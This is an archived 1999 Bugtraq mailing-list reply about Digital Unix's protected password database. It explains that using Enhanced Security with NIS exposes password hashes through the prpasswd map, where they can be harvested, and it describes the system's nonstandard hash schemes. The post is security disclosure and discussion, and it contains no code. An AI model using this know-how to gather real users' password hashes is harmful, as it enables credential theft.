[9869] in bugtraq
Re: Digital Unix 4 protected password database.
daemon@ATHENA.MIT.EDU (Jon Morgan)
Wed Mar 10 12:03:53 1999
Date: Wed, 10 Mar 1999 09:10:18 -0000
Reply-To: jmorgan@dircon.co.uk
From: Jon Morgan <jmorgan@DIRCON.CO.UK>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.OSF.4.03.9903091444100.31400-100000@isn.dac.neu.edu>
> And as noted, you do need root to run the program. But if you
> are root you don't really need it. A simple Perl script or even
> simpler shell script will do. Normally the /tcb/files/ tree is owned
> by auth.auth and not world readable. But, um, if you're root all bets
> are off anyway. You don't actually need the passwords.
The one thing that a lot of people miss with Digital UNIX is that
when you use Enhanced Security in conjunction with NIS, the entire
"protected" password subsystem is available as the NIS map prpasswd.
This contains, amongst other things, the password hash value. Then
your perl or sh script can just harvest these trivially. Why you
want to run a C2 secure system and then use NIS is beyond me, but at
least it gives you nifty password controls...
The one thing that CAN cause problems is that Digital UNIX can use
nonstandard hash algorithms (bigcrypt(), crypt16() and C1crypt()) as
well as the normal crypt(). Not only does this make coding slightly
complicated (as you have to get the correct hash algorithm, but when
a password is created within an Enhanced Security environment that is
over eight characters in length, another password round is created
AFTER the original to contain the rest of the password. This doesn't
make things impossible, just difficult - Digital kindly provide a set
of system calls to do most of this for you.
-jon.
--
Jon Morgan <jmorgan@dirconspam.co.uk>
Speaking for myself. nihil illegitemi carborvndvm
____________________
